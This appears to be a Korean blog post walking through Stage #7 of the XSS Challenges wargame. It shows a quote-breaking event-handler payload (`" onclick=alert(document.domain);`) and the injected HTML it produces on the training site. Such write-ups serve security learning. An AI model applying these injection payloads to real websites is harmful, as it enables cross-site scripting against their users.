$ whoami
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
Home
  • 분류 전체보기 (123)
    • Exploit (10)
      • Tools (2)
      • Exploit (5)
      • Bug Bounty (3)
    • Wargame (84)
      • HackCTF (15)
      • XSS game (6)
      • Dreamhack (2)
      • Webhacking.kr (10)
      • XSS Challenges (8)
      • H4CKING GAME (2)
      • 정보보호영재교육원 (1)
      • Lord of SQL Injection (40)
    • CTF (29)
      • YISF 2022 (0)
      • CBHC 2022 (1)
      • HeroCTF v4 (2)
      • corCTF 2022 (2)
      • Aero CTF 2022 (0)
      • BDSec CTF 2022 (4)
      • San Diego CTF 2022 (5)
      • WACon 2022 Qualifier (1)
      • Cyber Conflict Exercise 202.. (4)
      • DiceCTF 2023 (1)
      • Incognito 4.0 (3)
      • BYUCTF 2023 (1)
      • DEF CON 31 (1)
      • 2023 HackTheon Sejong (1)
      • Cyber Conflict Exercise 202.. (2)
      • CDDC 2023 (1)
      • YISF 2023 (0)
    • Archive (0)
블로그 내 검색
CONTACT

HACKINTOANETWORK

SECURITY RESEARCHER, BUG HUNTER, HACKER

  • Wargame/XSS Challenges

    [XSS Challenges] Stage #7

    2022. 2. 22.

    by. hackintoanetwork

    [XSS Challenges] Stage #7

    처음엔 아무렇게 입력해보았다.

    역시나 이렇게 간단하게 문제가 풀릴리가 없다.

    여러번 시도를 해보던 중 띄어쓰기를 하면 다음과 같이 스크립트 태그가 value 에서 빠져 나오는 걸 확인할 수 있었다.

    <input type="text" name="p1" size="50" value="&quot;>" &lt;script&gt;alert(document.domain)&lt;="" script&gt;&lt;&quot;="">

    하지만 소스코드를 보니 쿼터 필터링이 걸려 있었다. 

     

    쿼터를 빼주고 코드를 작성해보았다.

    " onclick=alert(document.domain);

    위의 코드를 입력하여 Seach 버튼을 클릭하면 브라우저는 아래와 같이 해석하여 실행하게 된다.

    <input type="text" name="p1" size="50" value="&quot;" onclick="alert(document.domain);">

    입력칸을 다시 눌러주면 onclick 이벤트에 의해 다음과 같이 alert 창이 뜨는 걸 확인할 수 있다.

    Stage #7 Clear

    http://xss-quiz.int21h.jp/stage07.php

     

    저작자표시 (새창열림)

    'Wargame > XSS Challenges' 카테고리의 다른 글

    [XSS Challenges] Stage #8  (0) 2022.02.22
    [XSS Challenges] Stage #6  (0) 2022.02.16
    [XSS Challenges] Stage #5  (0) 2022.02.15
    [XSS Challenges] Stage #4  (0) 2022.02.14
    [XSS Challenges] Stage #3  (0) 2022.02.14

    댓글

    관련글

    • [XSS Challenges] Stage #8 2022.02.22
    • [XSS Challenges] Stage #6 2022.02.16
    • [XSS Challenges] Stage #5 2022.02.15
    • [XSS Challenges] Stage #4 2022.02.14
    맨 위로
전체 글 보기
Tistory 로그인
Tistory 로그아웃
로그아웃 글쓰기 관리

Today

Total

Powered by hackintoanetwork

Designed by Nana
블로그 이미지
hackintoanetwork

티스토리툴바